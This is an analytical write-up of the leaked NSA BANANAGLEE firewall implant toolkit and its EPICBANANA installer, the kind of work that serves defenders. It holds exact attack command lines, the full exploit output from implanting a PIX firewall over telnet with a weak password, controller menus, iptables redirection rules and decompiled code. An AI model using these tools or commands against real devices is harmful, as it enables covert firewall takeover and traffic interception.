Some time ago, the Shadow Brokers broke into the Equation Group of the National Security Agency (NSA) and leaked onto the Internet some of the hacking tools they obtained from the group's systems.
The leak includes a tool set called BANANAGLEE, a non-persistent control tool set used to implant Cisco ASA and PIX series devices (it resides only in memory and is lost after a restart). Its purpose is to control the device once firewall privileges have been obtained. Different modules carry out specific tasks, such as traffic redirection and traffic capture. Several key modules are analyzed below.
LP
LP is the abbreviation of Listening Post (the term appears in egbl_and_broadcasting.txt and other documents). It is the general control program of the whole BANANAGLEE tool set, responsible for connecting to the firewall, sending control commands and so on. Its command line usage is as follows:
Usage for ./lp
--lp Listening Post IP Address
--implant Implant IP Address
--idkey Implant ID Key File
[--lptimeout] Listening Post Timeout Threshold(Optional)
--sport Specify Port to Send Packets From
--dport Specify Port to Send Packets To
[--bsize] Benign payload size(8-512)multiple of 8(Optional, defaults to 512)
[--logdir] Directory to hold the log files created
Function of each parameter:
- --lp specifies the IP address of the control end. In the tool's usage examples, a tool called NOPEN is usually used to set up a tunnel in advance that redirects 127.0.0.1 to the IP of the attacking machine, so 127.0.0.1 is usually specified here.
- --implant is the IP of the firewall at the controlled end. LP can only control it if BANANAGLEE has been implanted in advance.
- --idkey specifies the key file of the controlled end, which should be the one specified when the BANANAGLEE firmware was generated; it is used for authentication.
- --sport is the source port for sending packets and can be chosen freely.
- --dport is the target port, which must match the port specified when BANANAGLEE was configured.
The other parameters are optional.
After connecting to the firewall successfully, LP will enter an internal command control interface, in which control commands can be sent through different command options.
[<user>@<host> LP]# ./lp --lp 192.168.200.102 --implant 192.168.200.241 --sport 7541 --dport 23 --idkey /root/fw/Firewall/BANANAGLEE/BG2100/Install/JP/temp.key
./lp Version [STD]: 3.1.2 (Built: Jan 9 2012 06:33:29)
############################################
Enter "help" or "?" to see the menu
BG# ?
Session Commands
----------------
1)Open Session with firewall
7)Toggle Logging [currently ON]
8)Display Menu
9)Close Session with firewall
0)Quit Program
Firewall Information
---------------
10)Read Interface Info.(Pix Only)
11)Read Configuration
12)Read Arp Table
Raw API Calls
-------------
20)Read from firewall Memory
21)Malloc Memory on firewall
22)Free Malloc'd Memory on firewall
23)Write to firewall Memory
26)Change the uptime on a PIX
Modules
-------
30)List Uploadable Modules
31)Upload a Module
32)Activate a Module
33)De-Activate a Module
34)Remove Module
36)Get List of Uploaded Modules
38)Make All Active Modules Persistent
39)Remove Persistent Module Data
BG#
The main commands include four categories:
Session commands:
- Open session
- Toggle logging
- Display menu
- Close session
- Quit LP
Firewall information commands:
- Interface information (equivalent to the show interface command)
- Configuration information (equivalent to the show running-config command)
- ARP table (equivalent to the show arp command)
Memory operation commands:
- Read memory at an arbitrary address in the firewall OS
- Allocate memory
- Free memory
- Write memory at an arbitrary address
- Modify the uptime (by modifying system memory)
Module management commands:
- List uploadable modules
- Upload a specified module
- Activate a specified module
- Deactivate a specified module
- Remove a specified module
- Show uploaded modules
- Make active modules persistent
- Remove persistent module data
Because the flash capacity and memory of a firewall are not as abundant as those of a general-purpose operating system, BANANAGLEE is designed as a modular tool set: most of its functions are implemented as modules that are loaded only when needed and unloaded afterwards, to save memory. The main modules are described below.
The modules are stored in the modules directory. Only the modules for the PIX and ASA systems are found in the leaked BANANAGLEE version. Taking the PIX modules as an example, each module is named by module name and version and comes as .exe, .exe.bin and .mod files: the .exe is the file on the control side, the .exe.bin is the module file uploaded and loaded into the firewall, and the .mod is the module description configuration file.
The main modules include:
- BCANDY: console management module, supporting opening, closing and activating the console, among other functions.
- BPICKER: persistent installation module. Because BANANAGLEE is a non-persistent control program that exists only in memory and is lost when the firewall restarts, there is a dedicated module for making BANANAGLEE persistent. Its function is similar to that of another tool, JETPLOW.
- BPIE: used to filter and export specific traffic. The most important part of controlling a firewall is obtaining the desired network traffic, but not all traffic can be captured: on the one hand the data volume is too large to store, on the other hand it is not conducive to analysis. So a dedicated module filters the traffic and keeps only what is wanted.
- BBANJO: beacon-related module. I don't know the function of this module yet; I guess it is related to wireless.
- BMASSACRE: network data module, used to create and manage VPN tunnels, packet redirection and port address translation. This is the most important core module among all the modules.
- BPATROL: packet capture module, used to capture packets according to filtering rules.
- BFLEA: flash management module, used to read and write the firewall's flash memory; it may have been removed in later versions because of stability problems.
- BBALL: BIOS management module, used to read and write the firewall's BIOS; it may have been removed in later versions because of stability problems.
- BUSURPER: upgrade management module, used to upgrade BANANAGLEE.
Almost all functions of BANANAGLEE are implemented as modules. The executable programs and scripts in the LP directory are basically communication and management tools for the different modules.
Analysis of pd-3110
pd_miniprog-3110 is used to send packet filtering rules to the BMASSACRE module on the firewall. It is called by programs such as pd_start_pat.pl-3110 and bg_redirect.pl-3110.
pd_start_pat.pl-3110 is a management tool for port address translation (PAT); the corresponding BANANAGLEE module is BMASSACRE.
pd_miniprog-3110 is the main program for sending and receiving commands, while pd_start_pat.pl-3110 is the program the user actually runs: it calls pd_miniprog-3110 to send and receive the commands, so the user only needs to execute pd_start_pat.pl-3110.
pd_start_pat.pl-3110 is a Perl script. Its usage is as follows:
Usage: pd_start_pat.pl --lp <LP ip> --implant <Impant ip> --idkey <Implant key file>
[--lptimeout <lp timeout>] [--bsize <benign size>] --cmd <command number>
--attack_ip <attack_ip> --intermediate_ip <intermediate_ip>
--attack_int <interface> --target_int <interface> --port_offset <port offset>
--trans_timeout <timeout> --pat_timeout <seconds> --attack_port <port>
--target_port <port> [--logdir <logdir>]
--lp <LP ip>
IP Address of the LP box
--implant <Impant ip>
IP Address of the Implanted box
--idkey <Implant key file>
File containing key information for the implant
[--lptimeout <lp timeout>]
The amount of time (in seconds) the LP should wait for a response
[--bsize <benign size>]
(Optional) The max packet size for packets traveling between the LP and implant
--cmd <command number>
The command number of the PD_addRuleHandler in hex
--intermediate_ip <ip>
IP address of the intermediate machine
[--orig_dest_ip <ip>]
IP address of the original destination IP for packets coming from the target
--attack_ip <ip>
IP address of the attack machine
--attack_int <ip>
Number of the interface that the attack machine is connected to
--attack_port <ip>
Port to tunnel to on the target machine
--target_int <ip>
Number of the interface that the target machine is connected to
--port_offset <port>
First port to use when building the tranlations
--trans_timeout <port>
Timeout for individual entries in the translation table
--pat_timeout <seconds>
Overall timeout for the PAT action
[--logdir <logdir>]
(Optional) Directory to store log files in (defaults to .)
$pd_mini = sprintf(
"./pd_miniprog-3110 --lp %s --implant %s --idkey %s --sport %s --dport %s ",
$opt_lp, $opt_implant, $opt_idkey, $opt_sport, $opt_dport, );
if ( defined($opt_lptimeout) ) {
$pd_mini = sprintf( "%s --lptimeout %s", $pd_mini, $opt_lptimeout );
}
if ( defined($opt_bsize) ) {
$pd_mini = sprintf( "%s --bsize %s", $pd_mini, $opt_bsize );
}
if ( defined($opt_logdir) ) {
$pd_mini = sprintf( "%s --logdir %s", $pd_mini, $opt_logdir );
}
print "$pd_mini --cmd $opt_cmd --name add_rule --arg $pat_filt_filename\n";
system("$pd_mini --cmd $opt_cmd --name add_rule --arg $pat_filt_filename");
int __cdecl PD_addRuleHandler(int a1, unsigned int a2)
{
unsigned __int8 v2;
int result;
int v4;
int v5;
unsigned __int8 v6;
v2 = 0;
if ( (a2 <= 7 | a1 == 0) & 1
|| (*(_DWORD *)(a1 + 4) = reverse4(*(_DWORD *)(a1 + 4)),
v4 = reverse4(*(_DWORD *)a1),
*(_DWORD *)a1 = v4,
v5 = deserializeDroprule(*(_DWORD *)(a1 + 4), v4),
v2 = 0,
!v5) )
{
result = (*(int (__cdecl **)(_DWORD))(**(_DWORD **)OS_VER + 84))(v2);
}
else
{
v6 = PD_addRule(v5);
result = (*(int (__cdecl **)(_DWORD))(**(_DWORD **)OS_VER + 84))(v6);
}
return result;
}
PD_addRuleHandler first calls deserializeDroprule to convert the rule into its binary form, and then calls PD_addRule to add the binary rule to the internal list. In this way, every packet that arrives at the firewall first enters BANANAGLEE, which filters it according to the rules before handing it back to the firewall for normal processing.
bg_redirector-3110 analysis
bg_redirector-3110 is a tool for traffic redirection and encryption. It is called by start_redirector.pl-3110 and stop_redirector.sh-3110, and works together with the BMASSACRE module of BANANAGLEE on the firewall.
start_redirector.pl-3110 is a Perl script similar to pd_start_pat.pl-3110. It receives the user's command, generates a pcap filter rule file (Berkeley Packet Filter format), and then calls pd_miniprog-3110 to upload the rules to the BMASSACRE module of BANANAGLEE on the firewall. A parameter --enc_key is needed to specify the key file used for encryption; the key file can be generated with another executable in the same directory, keygen-3110. The RC6 algorithm is used to encrypt the data stream. Finally, start_redirector.pl-3110 calls bg_redirect.pl-3110 to forward the traffic locally. bg_redirect.pl-3110 executes two iptables rules on the local machine:
/sbin/iptables -I OUTPUT 1 -s $opt_orig_src_ip -d $opt_clr_tunnel_ip -p $opt_proto -j QUEUE
/sbin/iptables -t mangle -I PREROUTING 1 -s $opt_orig_src_ip -d $opt_clr_tunnel_ip -p $opt_proto -j QUEUE
The forwarded data is diverted to the QUEUE target in the mangle table, and bg_redirector-3110 is then invoked to encrypt and decrypt it; the enc_key generated earlier is still needed. Reverse analysis shows that after bg_redirector-3110 starts listening on the corresponding local port, it calls ET_encryptClearPacket and ET_encryptEncryptedPacket to encrypt and decrypt the data. The encryption routine is as follows:
int __cdecl ET_encryptClearPacket(int a1, int a2, __int16 a3, __int16 a4, int a5, int a6)
{
int v6;
int v7;
int v8;
int v9;
__int16 v10;
int v11;
int v13; // [sp+28h] [bp-64h]@4
int v14; // [sp+50h] [bp-3Ch]@6
int v15; // [sp+54h] [bp-38h]@7
v6 = 0;
if ( a1 )
{
if ( a2 )
{
if ( *(_DWORD *)(a1 + 4) )
{
v13 = *(_DWORD *)a1;
if ( *(_DWORD *)a1 )
{
if ( *(_DWORD *)a1 <= 0x20Eu )
{
memset(&v14, 0, 0x14u);
*(_DWORD *)a2 = v13 + 22;
v7 = malloc(v13 + 22);
*(_DWORD *)(a2 + 4) = v7;
v6 = 0;
if ( v7 )
{
memcpy(v7 + 22, *(_DWORD *)(a1 + 4), *(_DWORD *)a1);
v8 = *(_DWORD *)(a2 + 4);
*(_DWORD *)(v8 + 12) = reverse4(-557122643);
*(_WORD *)(v8 + 16) = a3;
*(_DWORD *)v8 = a5;
*(_WORD *)(v8 + 18) = a4;
v9 = *(_DWORD *)a1;
*(_WORD *)(v8 + 20) = *(_DWORD *)a1;
v10 = reverse2(v9);
v11 = *(_DWORD *)a1 + 10;
*(_WORD *)(v8 + 20) = v10;
SHA1(v8 + 12, v11, &v14);
*(_DWORD *)(v8 + 4) = v14;
*(_DWORD *)(v8 + 8) = v15;
rc6_encrypt(v8 + 12, v8 + 12, v11, a6, v8 + 4);
v6 = a2;
}
}
}
}
}
}
return v6;
}
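The buffer that ET_encryptClearPacket assembles can be reconstructed from the offsets in the decompiled function above: a5 at offset 0, the first 8 bytes of a SHA1 digest at offset 4, the byte-swapped magic at offset 12, a3 and a4 at 16 and 18, a big-endian length at 20 and the payload from 22, with SHA1 covering everything from offset 12 and rc6_encrypt then encrypting that same region in place. The Python below is an added illustration written for this article; it is not code from the leaked tool or from the original post. It rebuilds the pre-encryption layout and parses and verifies it, stopping before the rc6_encrypt step, whose mode and parameters the page does not give, so it applies to buffers before encryption or after an analyst has decrypted them from offset 12 onward. The names a3, a4 and a5 are kept from the decompiler because their meaning is not documented; the assumption that the host is little-endian x86 comes from the 32-bit __cdecl decompilation.

```python
import hashlib
import hmac
import struct

# Constants recovered from the decompiled ET_encryptClearPacket.
# -557122643 as an unsigned 32-bit value is 0xDECAFBAD; reverse4() byte-swaps it,
# so on a little-endian host (assumption: 32-bit x86) it lands in memory as
# DE CA FB AD, i.e. big-endian.
ET_MAGIC = (-557122643) & 0xFFFFFFFF
ET_HEADER_LEN = 22        # malloc(len + 22)
ET_MAX_PAYLOAD = 0x20E    # the "<= 0x20Eu" length check
ET_HASH_LEN = 8           # v14 and v15: two dwords of the SHA1 digest kept at offset 4
ET_AUTH_OFFSET = 12       # SHA1 (and later rc6_encrypt) cover offset 12 .. end


def build_et_clear_packet(payload: bytes, a3: int, a4: int, a5: int) -> bytes:
    """Rebuild the clear-text buffer exactly as the decompiled code lays it out,
    stopping just before rc6_encrypt. a3/a4/a5 keep the decompiler's names."""
    # The original returns 0 (failure) for a NULL buffer, a zero length or a length > 0x20E.
    if not payload or len(payload) > ET_MAX_PAYLOAD:
        raise ValueError("payload must be 1..%d bytes" % ET_MAX_PAYLOAD)
    body = (
        struct.pack(">I", ET_MAGIC)                       # offset 12: magic, stored byte-swapped
        + struct.pack("<HH", a3 & 0xFFFF, a4 & 0xFFFF)    # offsets 16 and 18: native-order words
        + struct.pack(">H", len(payload))                 # offset 20: reverse2(len), big-endian
        + payload                                         # offset 22: memcpy'd payload
    )
    # SHA1(v8 + 12, len + 10, &v14): the digest covers magic..payload; only its
    # first 8 bytes (v14, v15) are stored, at offsets 4 and 8.
    digest = hashlib.sha1(body).digest()
    return struct.pack("<I", a5 & 0xFFFFFFFF) + digest[:ET_HASH_LEN] + body


def parse_et_clear_packet(packet: bytes) -> dict:
    """Parse a buffer in the pre-encryption layout (or one already decrypted from
    offset 12 onward) and report whether the stored SHA1 prefix matches."""
    if len(packet) < ET_HEADER_LEN:
        raise ValueError("shorter than the %d-byte header" % ET_HEADER_LEN)
    (a5,) = struct.unpack_from("<I", packet, 0)
    stored_hash = packet[4:4 + ET_HASH_LEN]
    (magic,) = struct.unpack_from(">I", packet, ET_AUTH_OFFSET)
    if magic != ET_MAGIC:
        raise ValueError("magic mismatch at offset 12: 0x%08x" % magic)
    a3, a4 = struct.unpack_from("<HH", packet, 16)
    (length,) = struct.unpack_from(">H", packet, 20)
    if length == 0 or length > ET_MAX_PAYLOAD or len(packet) != ET_HEADER_LEN + length:
        raise ValueError("bad length field %d for a %d-byte packet" % (length, len(packet)))
    body = packet[ET_AUTH_OFFSET:]
    hash_ok = hmac.compare_digest(hashlib.sha1(body).digest()[:ET_HASH_LEN], stored_hash)
    return {"a5": a5, "a3": a3, "a4": a4, "payload": packet[ET_HEADER_LEN:], "hash_ok": hash_ok}


def clear_prefix(packet: bytes) -> bytes:
    """The bytes that stay unencrypted on the wire: rc6_encrypt starts at offset 12."""
    return packet[:ET_AUTH_OFFSET]


if __name__ == "__main__":
    # Constructed sample input; the a3/a4/a5 values are arbitrary.
    sample = build_et_clear_packet(b"constructed sample payload", 0x0001, 0x0002, 0x12345678)
    print("header:", sample[:ET_HEADER_LEN].hex())
    print("parsed:", parse_et_clear_packet(sample))
```

Two points follow from the layout. The SHA1 prefix is an unkeyed digest of the plaintext, so a receiver can use it to detect corruption or a wrong decryption key, but it is not a MAC: anyone who can produce the ciphertext can also produce a matching digest. And because rc6_encrypt covers everything from offset 12, only a5 and the 8-byte digest prefix travel in the clear; the DECAFBAD magic is never visible on the wire, so it is a memory or post-decryption indicator rather than a network signature.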
It can be seen that SHA1 is computed first (its output, stored at offset 4, is passed to rc6_encrypt together with the key), and then RC6 is used to encrypt the data. Finally, when the encrypted redirection is finished, the user can run stop_redirector.sh-3110 to kill the bg_redirector-3110 process. The workflow of encrypted redirection is as follows:
Implantation of BANANAGLEE
BANANAGLEE is only a non-persistent control tool; it has to be implanted into the firewall system remotely, through a vulnerability or other means. Among the leaked tools is EPBA (EPICBANANA), which can be used to implant BANANAGLEE.
EPBA implants it over telnet or SSH using a weak password. The target IP, target firewall version, protocol (telnet or SSH), port, login user name and password, and target system flash capacity (PIX only) are given on the command line. Currently supported versions include ASA 711-832 and PIX 711-804. The attack process is as follows:
[<user>@<host> EPICBANANA]# python ./epicbanana_2.1.0.1.py -t 192.168.200.241 --proto=telnet --password 12345678 --target_vers=pix721 --mem=128M -p 23
===========================
EPICBANANA (v2.1.0.1) beginning...
target: 192.168.200.241
target_vers: pix721
memory size: 128M
payload: BM
protocol: telnet (port 23)
send delay: 1.0
response timeout: 20.0
credentials: username = pix / password = 12345678
verbose mode ON
===========================
building versions files for memory 128M, payload BM, and version pix721
make clean
rm -f *.o *_assembler *_loader.py *_loader.s *.pyc highmem.s
make 128M
cp highmem_128M.s highmem.s
make pix721 PAYLOAD=128M_BM
./payload_merge.py pix721_skeleton.s pix721_128M_BM_payload.epba
pix721_skeleton.s + highmem.s + pix721_128M_BM_payload.epba = pix721_loader.s
as --32 -o pix721_loader.o pix721_loader.s
gcc -m32 -c -o assembler.o assembler.c
as --32 -o util.o util.s
gcc -m32 -o pix721_assembler assembler.o util.o pix721_loader.o
./pix721_assembler
creating file pix721_loader.py
forbidden bytes found in encoded block[1], try again
forbidden bytes found in encoded block[1], try again
forbidden bytes found in encoded block[1], try again
forbidden bytes found in encoded block[1], try again
mask bytes: b1:36; b2:30; b3:6e; b4:63; b5:23; b6:db; b7:41; b8:aa; b9:3e; b10:82; b11:b1; b12:34; b13:7b;
cksums: b2:90; b3:b3; b4:a8; b5:e6; b6:46; b7:b5; b8:61; b9:1b; b10:28; b11:e0; b12:90; b13:90;
payload prepared
initiating telnet
***
User Access Verification
Password:
***
received password prompt, sending
***
Type help or '?' for a list of available commands.
pixfirewall>
***
received prompt, we're in
sending payload
sending command 1/15, len 833
received expected error msg, still alive
sending command 2/15, len 525
received expected error msg, still alive
sending command 3/15, len 759
received expected error msg, still alive
sending command 4/15, len 993
received expected error msg, still alive
sending command 5/15, len 993
received expected error msg, still alive
sending command 6/15, len 993
received expected error msg, still alive
sending command 7/15, len 993
received expected error msg, still alive
sending command 8/15, len 993
received expected error msg, still alive
sending command 9/15, len 993
received expected error msg, still alive
sending command 10/15, len 993
received expected error msg, still alive
sending command 11/15, len 993
received expected error msg, still alive
sending command 12/15, len 569
received expected error msg, still alive
sending command 13/15, len 3
received expected error msg, still alive
sending command 14/15, len 3
received expected error msg, still alive
sending command 15/15, len 9
received expected error msg, still alive
payload sent
waiting for response from target
no status returned from target, could be an exploit failure, or this is a version where we don't expect a status return
Here the target was PIX 7.2.1. Although the output finally shows that the attack may have failed, the implant has in fact succeeded. Next, the bride-1120 tool under BANANAGLEE can be used to connect to it.
[<user>@<host> LP]# ./bride-1120 --lp 192.168.200.102 --implant 192.168.200.241 --sport 7541 --dport 23
The source port is: 7541
The destination port is: 23
The local IP address is: 192.168.200.102
Using DAT file from directory ../../Dats/.
./bride-1120 Version [STD]: 1.1.2 (Built: Feb 27 2013 13:26:38)
Session Commands
----------------
1) Open Session with firewall
8) Display Menu
0) Quit Program
BANAL RIDE# 1
Session opened with firewall.
D-H Key: 75a31fc2f3330b97b94d436d4fc86489
BANAL RIDE# 8
Session Commands
----------------
4) Remove BANALMONKEY
5) Remove BANANAGLEE
8) Display Menu
9) Close Session with firewall
0) Quit Program
Raw API Calls
-------------
20) Read from firewall Memory
21) Malloc Memory on firewall
22) Free Malloc'd Memory on firewall
23) Write to firewall Memory
24) Get version of Firewall OS
BananaGlee
-------------
30) Write BananaGlee to Memory
BANAL RIDE# 24
###################
# Firewall OS version
# OS VERSION: 7.2(1)